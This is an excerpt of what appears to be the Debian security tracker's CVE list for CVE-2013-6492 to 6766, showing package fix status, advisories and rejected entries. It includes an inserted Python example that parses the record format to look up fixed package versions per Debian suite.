CVE-2013-6738 (Cross-site scripting (XSS) vulnerability in IBM SmartCloud Analytics L ...)
	NOT-FOR-US: IBM
CVE-2013-6737 (IBM System Storage Storwize V7000 Unified 1.3.x and 1.4.x before 1.4.3 ...)
	NOT-FOR-US: IBM Storwize V7000 Unified
CVE-2013-6736 RESERVED
CVE-2013-6735 (IBM WebSphere Portal 6.0.0.x through 6.0.0.1, 6.0.1.x through 6.0.1.7, ...)
	NOT-FOR-US: IBM WebSphere Portal
CVE-2013-6734 (IBM WebSphere eXtreme Scale Client 7.1 through 8.6.0.4 does not proper ...)
	NOT-FOR-US: IBM WebSphere
CVE-2013-6733 (Cross-site scripting (XSS) vulnerability in the Web Application in the ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-6732 (Cross-site scripting (XSS) vulnerability in the server in IBM Cognos B ...)
	NOT-FOR-US: IBM Cognos
CVE-2013-6731 (IBM Netezza Performance Portal 2.x before 2.0.0.3 allows remote authen ...)
	NOT-FOR-US: IBM Netezza
CVE-2013-6730 (IBM WebSphere Portal 6.1.0.x through 6.1.0.6 CF27, 6.1.5.x through 6.1 ...)
	NOT-FOR-US: IBM WebSphere Portal
CVE-2013-6729 (Cross-site scripting (XSS) vulnerability in IBM QuickFile 1.0.0.0 befo ...)
	NOT-FOR-US: IBM QuickFile
CVE-2013-6728 (The charting component in IBM WebSphere Dashboard Framework (WDF) 6.1. ...)
	NOT-FOR-US: IBM WebSphere Dashboard Framework
CVE-2013-6727 (The Connect client in IBM Sametime 8.5.2 through 8.5.2.1 and 9.0 befor ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-6726 (Multiple cross-site scripting (XSS) vulnerabilities in WebProcess.srv ...)
	NOT-FOR-US: IBM TRIRIGA Application Platform
CVE-2013-6725 (Cross-site scripting (XSS) vulnerability in the Administrative Console ...)
	NOT-FOR-US: IBM WebSphere
CVE-2013-6724 (Unspecified vulnerability in the vsflex8l ActiveX control in IBM SPSS ...)
	NOT-FOR-US: IBM SPSS SamplePower
CVE-2013-6723 (IBM WebSphere Portal 8.0.0.1 before CF09 does not properly handle refe ...)
	NOT-FOR-US: IBM WebSphere Portal
CVE-2013-6722 (Unrestricted file upload vulnerability in the Registration/Edit My Pro ...)
	NOT-FOR-US: IBM WebSphere Portal
CVE-2013-6721 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Service Regi ...)
	NOT-FOR-US: IBM WebSphere Service Registry and Repository
CVE-2013-6720 (Directory traversal vulnerability in download.php in the Passive Captu ...)
	NOT-FOR-US: IBM Tealeaf
CVE-2013-6719 (delivery.php in the Passive Capture Application (PCA) web console in I ...)
	NOT-FOR-US: IBM Tealeaf CX
CVE-2013-6718 (The Advanced Management Module (AMM) with firmware 3.64B, 3.64C, and 3 ...)
	NOT-FOR-US: IBM firmware
CVE-2013-6717 (The OLAP query engine in IBM DB2 and DB2 Connect 9.7 through FP9, 9.8 ...)
	NOT-FOR-US: IBM
CVE-2013-6716 REJECTED
CVE-2013-6715 RESERVED
CVE-2013-6714 (The FlashCopy Manager for VMware component in IBM Tivoli Storage Flash ...)
	NOT-FOR-US: IBM Tivoli Storage FlashCopy Manager
CVE-2013-6713 (The Data Protection for VMware component in IBM Tivoli Storage Manager ...)
	NOT-FOR-US: IBM Tivoli Storage Manager for Virtual Environments
CVE-2013-6712 (The scan function in ext/date/lib/parse_iso_intervals.c in PHP through ...)
	{DSA-2816-1}
	- php5 5.5.6+dfsg-2 (bug #731112)
	NOTE: https://git.php.net/?p=php-src.git;a=commit;h=12fe4e90be7bfa2a763197079f68f5568a14e071
CVE-2013-6711 (Cross-site scripting (XSS) vulnerability in the product-creation admin ...)
	NOT-FOR-US: Cisco
CVE-2013-6710 (Cross-site request forgery (CSRF) vulnerability in Cisco WebEx Trainin ...)
	NOT-FOR-US: Cisco
CVE-2013-6709 (The registration component in Cisco WebEx Training Center provides the ...)
	NOT-FOR-US: Cisco
CVE-2013-6708 (Cisco Cloud Portal 9.4 allows remote attackers to read files of unspec ...)
	NOT-FOR-US: Cisco
CVE-2013-6707 (Memory leak in the connection-manager implementation in Cisco Adaptive ...)
	NOT-FOR-US: Cisco
CVE-2013-6706 (The Cisco Express Forwarding processing module in Cisco IOS XE allows ...)
	NOT-FOR-US: Cisco IOS XE
CVE-2013-6705 (The IP Device Tracking (IPDT) feature in Cisco IOS and IOS XE allows r ...)
	NOT-FOR-US: Cisco
CVE-2013-6704 (Cisco IOS XE does not properly manage memory for TFTP UDP flows, which ...)
	NOT-FOR-US: Cisco
CVE-2013-6703 (The TLS/SSLv3 module on Cisco ONS 15454 controller cards allows remote ...)
	NOT-FOR-US: Cisco
CVE-2013-6702 (The management implementation on Cisco ONS 15454 controller cards with ...)
	NOT-FOR-US: Cisco
CVE-2013-6701 (The tNetTaskLimit process on the Transport Node Controller (TNC) on Ci ...)
	NOT-FOR-US: Cisco
CVE-2013-6700 (The SNMP module in Cisco IOS XR allows remote attackers to cause a den ...)
	NOT-FOR-US: Cisco IOS XR
CVE-2013-6699 (The Control and Provisioning of Wireless Access Points (CAPWAP) protoc ...)
	NOT-FOR-US: Cisco
CVE-2013-6698 (The web interface on Cisco Wireless LAN Controller (WLC) devices does ...)
	NOT-FOR-US: Cisco
CVE-2013-6697 RESERVED
CVE-2013-6696 (Cisco Adaptive Security Appliance (ASA) Software does not properly han ...)
	NOT-FOR-US: Cisco
CVE-2013-6695 (The RBAC implementation in Cisco Secure Access Control System (ACS) do ...)
	NOT-FOR-US: Cisco
CVE-2013-6694 (The IPSec implementation in Cisco IOS allows remote attackers to cause ...)
	NOT-FOR-US: Cisco
CVE-2013-6693 (The MLDP implementation in Cisco IOS 15.3(3)S and earlier on 7600 rout ...)
	NOT-FOR-US: Cisco
CVE-2013-6692 (Cisco IOS XE 3.8S(.2) and earlier does not properly use a DHCP pool du ...)
	NOT-FOR-US: Cisco
CVE-2013-6691 (The WebVPN CIFS implementation in Cisco Adaptive Security Appliance (A ...)
	NOT-FOR-US: Cisco ASA
CVE-2013-6690 (Multiple cross-site scripting (XSS) vulnerabilities in the web interfa ...)
	NOT-FOR-US: Cisco
CVE-2013-6689 (Cisco Unified Communications Manager (Unified CM) 9.1(1) and earlier a ...)
	NOT-FOR-US: Cisco Unified Communications Manager
CVE-2013-6688 (Directory traversal vulnerability in the license-upload interface in t ...)
	NOT-FOR-US: Cisco Unified Communications Manager
CVE-2013-6687 (The web portal in the Enterprise License Manager component in Cisco We ...)
	NOT-FOR-US: Cisco WebEx Meetings Server
CVE-2013-6686 (The SSL VPN implementation in Cisco IOS 15.3(1)T2 and earlier allows r ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-6685 (The firmware on Cisco Unified IP phones 8961, 9951, and 9971 uses weak ...)
	NOT-FOR-US: Cisco Unified IP phones
CVE-2013-6684 (The web framework on Cisco Wireless LAN Controller (WLC) devices does ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-6683 (The IPv6 implementation in Cisco NX-OS does not properly handle neighb ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2013-6682 (The phone-proxy implementation in Cisco Adaptive Security Appliance (A ...)
	NOT-FOR-US: Cisco Adaptive Security Appliance
CVE-2013-6681 (Tube Map Live Underground for Android before 3.0.22 has an Information ...)
	NOT-FOR-US: Tube Map Live Underground for Android
CVE-2013-6680 REJECTED
CVE-2013-6679 REJECTED
CVE-2013-6678 REJECTED
CVE-2013-6677 REJECTED
CVE-2013-6676 REJECTED
CVE-2013-6675 REJECTED
CVE-2013-6674 (Cross-site scripting (XSS) vulnerability in Mozilla Thunderbird 17.x t ...)
	- icedove 24.2.0-1
	[squeeze] - icedove
	NOTE: http://www.mozilla.org/security/announce/2014/mfsa2014-14.html
CVE-2013-6673 (Mozilla Firefox before 26.0, Firefox ESR 24.x before 24.2, Thunderbird ...)
	- iceweasel 24.2.0esr-1
	[squeeze] - iceweasel
	- icedove 24.2.0-1
	[squeeze] - icedove
	- iceape
	[wheezy] - iceape
	[squeeze] - iceape
CVE-2013-6672 (Mozilla Firefox before 26.0 and SeaMonkey before 2.23 on Linux allow u ...)
	- iceweasel (Only affects Firefox 25)
	- iceape (Only affects Firefox 25)
CVE-2013-6671 (The nsGfxScrollFrameInner::IsLTR function in Mozilla Firefox before 26 ...)
	- iceweasel 24.2.0esr-1
	- icedove 24.2.0-1
	- iceape
	[squeeze] - iceweasel
	[squeeze] - icedove
	[wheezy] - iceape
	[squeeze] - iceape
CVE-2013-6670 RESERVED
CVE-2013-6669 RESERVED
CVE-2013-6668 (Multiple unspecified vulnerabilities in Google V8 before 3.24.35.10, a ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
	- libv8
	[wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy)
	[squeeze] - libv8 (Unsupported in squeeze-lts)
	- libv8-3.14 (unimportant; bug #773671)
	NOTE: libv8 not covered by security support
CVE-2013-6667 (Multiple unspecified vulnerabilities in Google Chrome before 33.0.1750 ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6666 (The PepperFlashRendererHost::OnNavigate function in renderer/pepper/pe ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6665 (Heap-based buffer overflow in the ResourceProvider::InitializeSoftware ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6664 (Use-after-free vulnerability in the FormAssociatedElement::formRemoved ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6663 (Use-after-free vulnerability in the SVGImage::setContainerSize functio ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6662 (Google Chrome caches TLS sessions before certificate validation occurs ...)
	NOTE: Chrome issue fixed end of 2013, not really worth figuring out in which version
CVE-2013-6661 (Multiple unspecified vulnerabilities in Google Chrome before 33.0.1750 ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6660 (The drag-and-drop implementation in Google Chrome before 33.0.1750.117 ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6659 (The SSLClientSocketNSS::Core::OwnAuthCertHandler function in net/socke ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6658 (Multiple use-after-free vulnerabilities in the layout implementation i ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6657 (core/html/parser/XSSAuditor.cpp in the XSS auditor in Blink, as used i ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6656 (The XSSAuditor::init function in core/html/parser/XSSAuditor.cpp in th ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6655 (Use-after-free vulnerability in Blink, as used in Google Chrome before ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6654 (The SVGAnimateElement::calculateAnimatedValue function in core/svg/SVG ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6653 (Use-after-free vulnerability in the web contents implementation in Goo ...)
	{DSA-2883-1}
	- chromium-browser 33.0.1750.152-1
	[squeeze] - chromium-browser
CVE-2013-6652 (Directory traversal vulnerability in sandbox/win/src/named_pipe_dispat ...)
	- chromium-browser (Windows-specific)
CVE-2013-6651 RESERVED
CVE-2013-6650 (The StoreBuffer::ExemptPopularPages function in store-buffer.cc in Goo ...)
	{DSA-2862-1}
	- chromium-browser 32.0.1700.123-1
	[squeeze] - chromium-browser
	- libv8
	[wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy)
	[squeeze] - libv8 (Unsupported in squeeze-lts)
	- libv8-3.14 (unimportant; bug #773671)
	NOTE: libv8 not covered by security support
CVE-2013-6649 (Use-after-free vulnerability in the RenderSVGImage::paint function in ...)
	{DSA-2862-1}
	- chromium-browser 32.0.1700.123-1
	[squeeze] - chromium-browser
	- libv8
	[wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy)
	[squeeze] - libv8 (Unsupported in squeeze-lts)
	- libv8-3.14 (unimportant; bug #773671)
	NOTE: libv8 not covered by security support
CVE-2013-6648 (SkRegion::setPath in Skia allows remote attackers to cause a denial of ...)
	- skia (bug #818180)
CVE-2013-6647 (A use-after-free in AnimationController::endAnimationUpdate in Google ...)
	- chromium-browser (According to upstream bug only affected interim version, not a stable release)
CVE-2013-6646 (Use-after-free vulnerability in the Web Workers implementation in Goog ...)
	{DSA-2862-1}
	- chromium-browser 32.0.1700.123-1
	[squeeze] - chromium-browser
CVE-2013-6645 (Use-after-free vulnerability in the OnWindowRemovingFromRootWindow fun ...)
	{DSA-2862-1}
	- chromium-browser 32.0.1700.123-1
	[squeeze] - chromium-browser
CVE-2013-6644 (Multiple unspecified vulnerabilities in Google Chrome before 32.0.1700 ...)
	{DSA-2862-1}
	- chromium-browser 32.0.1700.123-1
	[squeeze] - chromium-browser
CVE-2013-6643 (The OneClickSigninBubbleView::WindowClosing function in browser/ui/vie ...)
	{DSA-2862-1}
	- chromium-browser 32.0.1700.123-1
	[squeeze] - chromium-browser
CVE-2013-6642 (Google Chrome through 32.0.1700.23 on Android allows remote attackers ...)
	- chromium-browser (Only affects Google Chrome on Android)
CVE-2013-6641 (Use-after-free vulnerability in the FormAssociatedElement::formRemoved ...)
	{DSA-2862-1}
	- chromium-browser 32.0.1700.123-1
	[squeeze] - chromium-browser
CVE-2013-6640 (The DehoistArrayIndex function in hydrogen-dehoist.cc (aka hydrogen.cc ...)
	{DSA-2811-1}
	- libv8
	[wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy)
	[squeeze] - libv8 (Unsupported in squeeze-lts)
	- libv8-3.14 3.14.5.8-5
	- chromium-browser 31.0.1650.63-1
	[squeeze] - chromium-browser
CVE-2013-6639 (The DehoistArrayIndex function in hydrogen-dehoist.cc (aka hydrogen.cc ...)
	{DSA-2811-1}
	- libv8
	[wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy)
	[squeeze] - libv8 (Unsupported in squeeze-lts)
	- libv8-3.14 3.14.5.8-5
	- chromium-browser 31.0.1650.63-1
	[squeeze] - chromium-browser
CVE-2013-6638 (Multiple buffer overflows in runtime.cc in Google V8 before 3.22.24.7, ...)
	{DSA-2811-1}
	- libv8
	[wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy)
	[squeeze] - libv8 (Unsupported in squeeze-lts)
	- libv8-3.14 (unimportant; bug #773671)
	- chromium-browser 31.0.1650.63-1
	[squeeze] - chromium-browser
	NOTE: libv8 not covered by security support
CVE-2013-6637 (Multiple unspecified vulnerabilities in Google Chrome before 31.0.1650 ...)
	{DSA-2811-1}
	- chromium-browser 31.0.1650.63-1
	[squeeze] - chromium-browser
CVE-2013-6636 (The FrameLoader::notifyIfInitialDocumentAccessed function in core/load ...)
	{DSA-2811-1}
	- chromium-browser 31.0.1650.63-1
	[squeeze] - chromium-browser
CVE-2013-6635 (Use-after-free vulnerability in the editing implementation in Blink, a ...)
	{DSA-2811-1}
	- chromium-browser 31.0.1650.63-1
	[squeeze] - chromium-browser
CVE-2013-6634 (The OneClickSigninHelper::ShowInfoBarIfPossible function in browser/ui ...)
	{DSA-2811-1}
	- chromium-browser 31.0.1650.63-1
	[squeeze] - chromium-browser
CVE-2013-6633 RESERVED
CVE-2013-6620 RESERVED
CVE-2013-6619 RESERVED
CVE-2013-6618 (jsdm/ajax/port.php in J-Web in Juniper Junos before 10.4R13, 11.4 befo ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-6617 (The salt master in Salt (aka SaltStack) 0.11.0 through 0.17.0 does not ...)
	- salt 0.17.1+dfsg-1
CVE-2013-6766 (OpenVAS Administrator 1.2 before 1.2.2 and 1.3 before 1.3.2 allows rem ...)
	NOT-FOR-US: OpenVAS Administrator (only uploaded to experimental 2.5 years ago)
CVE-2013-6765 (OpenVAS Manager 3.0 before 3.0.7 and 4.0 before 4.0.4 allows remote at ...)
	NOT-FOR-US: OpenVAS Manager (only uploaded to experimental 2.5 years ago)
CVE-2013-6632 (Integer overflow in Google Chrome before 31.0.1650.57 allows remote at ...)
	{DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
CVE-2013-6631 (Use-after-free vulnerability in the Channel::SendRTCPPacket function i ...)
	{DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
CVE-2013-6630 (The get_dht function in jdmarker.c in libjpeg-turbo through 1.3.0, as ...)
	{DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
	- libjpeg-turbo 1.3.0-3 (low; bug #729873)
	- libjpeg6b 6b1-4 (low; bug #729867)
	[squeeze] - libjpeg6b (Minor issue)
	[wheezy] - libjpeg6b 6b1-3+deb7u1
	- libjpeg8 8d-2 (low; bug #729867)
	[squeeze] - libjpeg8 (Minor issue)
	[wheezy] - libjpeg8 8d-1+deb7u1
	- iceweasel 24.2.0esr-1
	[squeeze] - iceweasel
	- icedove 24.2.0-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
	NOTE: http://packetstormsecurity.com/files/123989/IJG-jpeg6b-libjpeg-turbo-Uninitialized-Memory.html
CVE-2013-6629 (The get_sos function in jdmarker.c in (1) libjpeg 6b and (2) libjpeg-t ...)
	{DSA-2923-1 DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
	- libjpeg-turbo 1.3.0-3 (low; bug #729873)
	- libjpeg6b 6b1-4 (low; bug #729867)
	[wheezy] - libjpeg6b 6b1-3+deb7u1
	[squeeze] - libjpeg6b (Minor issue)
	- libjpeg8 8d-2 (low; bug #729867)
	[squeeze] - libjpeg8 (Minor issue)
	[wheezy] - libjpeg8 8d-1+deb7u1
	- iceweasel 24.2.0esr-1
	[squeeze] - iceweasel
	- icedove 24.2.0-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
	NOTE: http://packetstormsecurity.com/files/123989/IJG-jpeg6b-libjpeg-turbo-Uninitialized-Memory.html
CVE-2013-6628 (net/socket/ssl_client_socket_nss.cc in the TLS implementation in Googl ...)
	{DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
CVE-2013-6627 (net/http/http_stream_parser.cc in Google Chrome before 31.0.1650.48 do ...)
	{DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
CVE-2013-6626 (The WebContentsImpl::AttachInterstitialPage function in content/browse ...)
	{DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
CVE-2013-6625 (Use-after-free vulnerability in core/dom/ContainerNode.cpp in Blink, a ...)
	{DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
CVE-2013-6624 (Use-after-free vulnerability in Google Chrome before 31.0.1650.48 allo ...)
	{DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
CVE-2013-6623 (The SVG implementation in Blink, as used in Google Chrome before 31.0. ...)
	{DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
CVE-2013-6622 (Use-after-free vulnerability in the HTMLMediaElement::didMoveToNewDocu ...)
	{DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
CVE-2013-6621 (Use-after-free vulnerability in Google Chrome before 31.0.1650.48 allo ...)
	{DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
CVE-2013-6616 REJECTED
CVE-2013-6615 REJECTED
CVE-2013-6614 REJECTED
CVE-2013-6613 REJECTED
CVE-2013-6612 REJECTED
CVE-2013-6611 REJECTED
CVE-2013-6610 REJECTED
CVE-2013-6609 REJECTED
CVE-2013-6608 REJECTED
CVE-2013-6607 REJECTED
CVE-2013-6606 REJECTED
CVE-2013-6605 REJECTED
CVE-2013-6604 REJECTED
CVE-2013-6603 REJECTED
CVE-2013-6602 REJECTED
CVE-2013-6601 REJECTED
CVE-2013-6600 REJECTED
CVE-2013-6599 REJECTED
CVE-2013-6598 REJECTED
CVE-2013-6597 REJECTED
CVE-2013-6596 REJECTED
CVE-2013-6595 REJECTED
CVE-2013-6594 REJECTED
CVE-2013-6593 REJECTED
CVE-2013-6592 REJECTED
CVE-2013-6591 REJECTED
CVE-2013-6590 REJECTED
CVE-2013-6589 REJECTED
CVE-2013-6588 REJECTED
CVE-2013-6587 REJECTED
CVE-2013-6586 REJECTED
CVE-2013-6585 REJECTED
CVE-2013-6584 REJECTED
CVE-2013-6583 REJECTED
CVE-2013-6582 REJECTED
CVE-2013-6581 REJECTED
CVE-2013-6580 REJECTED
CVE-2013-6579 REJECTED
CVE-2013-6578 REJECTED
CVE-2013-6577 REJECTED
CVE-2013-6576 REJECTED
CVE-2013-6575 REJECTED
CVE-2013-6574 REJECTED
CVE-2013-6573 REJECTED
CVE-2013-6572 REJECTED
CVE-2013-6571 REJECTED
CVE-2013-6570 REJECTED
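The libjpeg records for CVE-2013-6629 and CVE-2013-6630 above show the full shape of a tracker entry: a {DSA-...} line, an unstable line carrying a fixed version and a "(low; bug #729867)" note, and per-suite lines where a bare "(Minor issue)" means the suite stays vulnerable. The following is an added example, not code from the Debian security tracker project: it parses that one-record-per-line layout of data/CVE/list and answers the question a vulnerability scanner actually asks, which version of a package fixes a given CVE in a given suite. It assumes the layout as rendered on this page, where the <no-dsa>/<not-affected>/<unfixed> state tags between package name and note have been dropped; if such a tag is present it is kept verbatim in a `tag` field but not interpreted. The sample input is an excerpt of the CVE-2013-6630 record above, constructed here in the tracker's tab-indented form.

```python
"""Parse Debian security-tracker records (the data/CVE/list layout above).
Added example, not the tracker project's own code; it assumes one record per
line: an unindented "CVE-YYYY-NNNN (description)" / "CVE-... RESERVED" header,
then indented "{DSA-...}", "- pkg [version] [(note)]", "[suite] - pkg ...",
"NOTE:" and "NOT-FOR-US:" lines.  A <no-dsa>-style state tag, which this
page's rendering dropped, is tolerated if present and kept verbatim."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

HEADER_RE = re.compile(r"^CVE-\d{4}-\d{4,}(?:\s|$)")
PKG_RE = re.compile(
    r"^(?:\[(?P<suite>[\w.-]+)\]\s+)?"    # optional "[suite]" prefix
    r"-\s+(?P<pkg>\S+)"                   # source package name
    r"(?:\s+<(?P<tag>[^>]+)>)?"           # optional <state> tag
    r"(?:\s+(?P<version>[0-9][^\s(]*))?"  # fixed version (digit or epoch first)
    r"(?:\s+\((?P<note>.*)\))?\s*$"       # trailing "(...)" free-text note
)

@dataclass
class PkgLine:
    package: str
    suite: Optional[str]    # None: the unstable/sid line
    version: Optional[str]  # None: no fixed version on this line
    tag: Optional[str]
    note: Optional[str]

@dataclass
class Record:
    cve: str
    description: Optional[str]
    state: Optional[str]    # "RESERVED", "REJECTED" or None
    dsas: List[str] = field(default_factory=list)
    packages: List[PkgLine] = field(default_factory=list)
    notes: List[str] = field(default_factory=list)
    not_for_us: Optional[str] = None

def parse_tracker(text: str) -> Dict[str, Record]:
    records: Dict[str, Record] = {}
    cur: Optional[Record] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if HEADER_RE.match(line):
            cve, _, rest = line.partition(" ")
            if rest in ("RESERVED", "REJECTED"):
                cur = Record(cve, None, rest)
            else:  # strip the "( ... )" the tracker wraps the description in
                desc = rest[1:-1] if rest[:1] == "(" and rest[-1:] == ")" else rest
                cur = Record(cve, desc or None, None)
            records[cve] = cur
        elif cur is None:
            raise ValueError(f"data line before any CVE header: {raw!r}")
        elif line[0] == "{" and line[-1] == "}":
            cur.dsas.extend(line[1:-1].split())
        elif line.startswith("NOTE:"):
            cur.notes.append(line[5:].strip())
        elif line.startswith("NOT-FOR-US:"):
            cur.not_for_us = line[11:].strip()
        else:
            m = PKG_RE.match(line)
            if m is None:
                raise ValueError(f"unrecognised tracker line: {raw!r}")
            cur.packages.append(PkgLine(m["pkg"], m["suite"], m["version"], m["tag"], m["note"]))
    return records

def note_fields(note: Optional[str]) -> Tuple[Optional[str], Optional[int]]:
    """Split a "low; bug #729873" style note into (severity, Debian bug number)."""
    if not note:
        return None, None
    sev = next((s for s in ("unimportant", "low", "medium", "high") if re.search(rf"\b{s}\b", note)), None)
    bug = re.search(r"bug #(\d+)", note)
    return sev, (int(bug.group(1)) if bug else None)

def fixed_version(records, cve, package, suite=None):
    """Version of `package` fixing `cve` in `suite` (None = unstable), or None.
    A suite line wins even without a version: that is the tracker's "still
    vulnerable, no update planned" form, e.g. "[squeeze] - libjpeg6b (Minor
    issue)".  Only a suite with no line of its own inherits the unstable one."""
    lines = [p for p in records[cve].packages if p.package == package]
    if not lines:
        raise LookupError(f"{package} is not listed for {cve}")
    for p in lines:
        if p.suite == suite:
            return p.version
    if suite is not None:
        for p in lines:
            if p.suite is None:
                return p.version
    return None

# Constructed sample: an excerpt of the CVE-2013-6630 record above, tab-indented.
SAMPLE = """\
CVE-2013-6630 (The get_dht function in jdmarker.c in libjpeg-turbo through 1.3.0, as ...)
	{DSA-2799-1}
	- libjpeg-turbo 1.3.0-3 (low; bug #729873)
	- libjpeg6b 6b1-4 (low; bug #729867)
	[squeeze] - libjpeg6b (Minor issue)
	[wheezy] - libjpeg6b 6b1-3+deb7u1
	NOTE: http://packetstormsecurity.com/files/123989/IJG-jpeg6b-libjpeg-turbo-Uninitialized-Memory.html
"""
```

Usage: `fixed_version(parse_tracker(SAMPLE), "CVE-2013-6630", "libjpeg6b", "wheezy")` returns "6b1-3+deb7u1", the same call with "squeeze" returns None because the squeeze line exists but records no fix, and libjpeg-turbo in wheezy inherits the unstable version "1.3.0-3" because it has no wheezy line. Deciding whether an installed package is actually vulnerable still needs a Debian version comparison (dpkg --compare-versions or python-apt) against the returned string; that step is deliberately left out here.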
CVE-2013-6569 REJECTED
CVE-2013-6568 REJECTED
CVE-2013-6567 REJECTED
CVE-2013-6566 REJECTED
CVE-2013-6565 REJECTED
CVE-2013-6564 REJECTED
CVE-2013-6563 REJECTED
CVE-2013-6562 REJECTED
CVE-2013-6561 REJECTED
CVE-2013-6560 REJECTED
CVE-2013-6559 REJECTED
CVE-2013-6558 REJECTED
CVE-2013-6557 REJECTED
CVE-2013-6556 REJECTED
CVE-2013-6555 REJECTED
CVE-2013-6554 REJECTED
CVE-2013-6553 REJECTED
CVE-2013-6552 REJECTED
CVE-2013-6551 REJECTED
CVE-2013-6550 REJECTED
CVE-2013-6549 REJECTED
CVE-2013-6548 REJECTED
CVE-2013-6547 REJECTED
CVE-2013-6546 REJECTED
CVE-2013-6545 REJECTED
CVE-2013-6544 REJECTED
CVE-2013-6543 REJECTED
CVE-2013-6542 REJECTED
CVE-2013-6541 REJECTED
CVE-2013-6540 REJECTED
CVE-2013-6539 REJECTED
CVE-2013-6538 REJECTED
CVE-2013-6537 REJECTED
CVE-2013-6536 REJECTED
CVE-2013-6535 REJECTED
CVE-2013-6534 REJECTED
CVE-2013-6533 REJECTED
CVE-2013-6532 REJECTED
CVE-2013-6531 REJECTED
CVE-2013-6530 REJECTED
CVE-2013-6529 REJECTED
CVE-2013-6528 REJECTED
CVE-2013-6527 REJECTED
CVE-2013-6526 REJECTED
CVE-2013-6525 REJECTED
CVE-2013-6524 REJECTED
CVE-2013-6523 REJECTED
CVE-2013-6522 REJECTED
CVE-2013-6521 REJECTED
CVE-2013-6520 REJECTED
CVE-2013-6519 REJECTED
CVE-2013-6518 REJECTED
CVE-2013-6517 REJECTED
CVE-2013-6516 REJECTED
CVE-2013-6515 REJECTED
CVE-2013-6514 REJECTED
CVE-2013-6513 REJECTED
CVE-2013-6512 REJECTED
CVE-2013-6511 REJECTED
CVE-2013-6510 REJECTED
CVE-2013-6509 REJECTED
CVE-2013-6508 REJECTED
CVE-2013-6507 REJECTED
CVE-2013-6506 REJECTED
CVE-2013-6505 REJECTED
CVE-2013-6504 REJECTED
CVE-2013-6503 REJECTED
CVE-2013-6502 REJECTED
CVE-2013-6501 (The default soap.wsdl_cache_dir setting in (1) php.ini-production and ...)
	- php5 (unimportant)
	NOTE: Rendered unexploitable by kernel-level hardening for /tmp races
CVE-2013-6500 REJECTED
CVE-2013-6499 REJECTED
CVE-2013-6498 RESERVED
CVE-2013-6497 (clamscan in ClamAV before 0.98.5, when using -a option, allows remote ...)
	{DLA-95-1}
	- clamav 0.98.5+dfsg-1
	[wheezy] - clamav 0.98.5+dfsg-0+deb7u1
	NOTE: https://bugzilla.clamav.net/show_bug.cgi?id=11088
CVE-2013-6496 (Red Hat Conga 0.12.2 allows remote attackers to obtain sensitive infor ...)
	NOT-FOR-US: Red Hat Conga
CVE-2013-6495 (JBossWeb Bayeux has reflected XSS ...)
	NOT-FOR-US: JBossWeb Bayeux
CVE-2013-6494 (fedup 0.9.0 in Fedora 19, 20, and 21 uses a temporary directory with a ...)
	NOT-FOR-US: fedup (Fedora specific)
CVE-2013-6493 (The LiveConnect implementation in plugin/icedteanp/IcedTeaNPPlugin.cc ...)
	- icedtea-web 1.4.2-1 (low)
	[wheezy] - icedtea-web (Minor issue)
CVE-2013-6492 (The Piranha Configuration Tool in Piranha 0.8.6 does not properly rest ...)
